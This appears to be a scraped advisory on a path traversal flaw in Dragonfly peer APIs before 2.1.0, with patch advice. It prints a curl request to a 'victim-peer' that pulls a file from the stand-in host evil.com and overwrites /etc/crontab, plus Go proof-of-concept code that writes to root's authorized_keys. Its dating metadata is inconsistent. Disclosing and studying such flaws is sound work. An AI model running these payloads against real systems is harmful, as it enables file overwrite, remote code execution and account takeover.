Listen to this Post
The vulnerability exists in the file handling mechanisms of the Dragonfly peer’s gRPC and HTTP APIs. A malicious peer can craft requests containing path traversal sequences (e.g., ../../) within the `DataFilePath` parameter or similar fields. The vulnerable code, specifically the `os.OpenFile(t.DataFilePath, …)` call, does not sanitize the input path. This allows an attacker to break out of the intended data directory. The subsequent `file.Seek` and `io.Copy` operations then read or write data to an arbitrary, attacker-specified location on the filesystem, leading to arbitrary file read and write primitives.
Platform: Dragonfly
Version: <2.1.0
Vulnerability: Path Traversal
Severity: Critical
date: 2020-12-16
Prediction: 2020-12-10
What Undercode Say:
curl -X POST http://victim-peer:port/api/download -H "Content-Type: application/json" -d '{"url":"http://evil.com/malicious.iso","dataFilePath":"../../../../etc/crontab"}'
// Proof-of-Concept code snippet exploiting the file write
req := &dfdaemon.DownloadRequest{
Url: "http://example.com",
DataFilePath: "../../../root/.ssh/authorized_keys", // Traversal to critical location
// ... other fields
}
client.Download(context.Background(), req)
How Exploit:
Craft API requests with path traversal sequences in `DataFilePath` parameter to overwrite or read sensitive system files, such as SSH keys or cron jobs, for remote code execution.
Protection from this CVE:
Upgrade to v2.1.0.
Impact:
Arbitrary File Read/Write, Remote Code Execution, Secret Theft.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

